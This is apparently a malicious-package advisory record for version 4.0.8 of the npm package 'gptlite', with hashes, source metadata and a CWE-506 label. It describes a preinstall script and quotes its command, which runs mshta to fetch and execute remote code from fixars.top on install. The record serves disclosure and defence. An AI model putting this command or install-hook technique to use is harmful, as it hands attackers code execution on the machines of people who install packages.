-= Per source details. Do not edit below this line.=-
The package's npm preinstall lifecycle script (preinstall.js, referenced from package.json's "preinstall": "node preinstall.js") invokes child_process.exec with the command cmd /c "mshta http://fixars.top". On Windows, mshta.exe fetches the remote HTML Application over plain HTTP from fixars.top and executes it as trusted code. The fetch runs automatically on npm install, before any consumer code is reviewed, and delivers arbitrary attacker-controlled code execution on the installer's machine. The destination domain is unrelated to any documented package purpose and is served over unauthenticated HTTP, so the executed content is fully attacker-controlled and mutable.
{
"malicious-packages-origins": [
{
"modified_time": "2026-07-13T17:38:10Z",
"versions": [
"4.0.8"
],
"sha256": "e1b12c4a304855689342c2732abcf11dec5cc206960f495525b967fca6d14662",
"id": "IN-MAL-2026-010274",
"source": "amazon-inspector",
"import_time": "2026-07-13T18:10:12.715663135Z"
}
]
}{
"evidence_files": [
{
"tlsh": "70b012d499453234b252a0e02c3060225807c441225055e0648c451d441741516235fd",
"sha256": "6531737cdf18669d076b7ff3bf8168ddc74828f385a4a037a47bd8767d11b889",
"path": "preinstall.js"
}
],
"package_integrity": [
{
"hashes": {
"sha1": "cdc53a1160bba6a26c8d25b1cd8b0b020b1a60e9",
"sha512_sri": "sha512-oxwoImsxVy/06e+Ao96U0fR3VMhUAK+8qsCKPLAGTWDl3yWm4xZd2PGxlI4J0EhS2e2iEu63xwPABtdwefRugQ=="
},
"filename": "gptlite-4.0.8.tgz"
}
]
}
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/gptlite/MAL-2026-10461.json"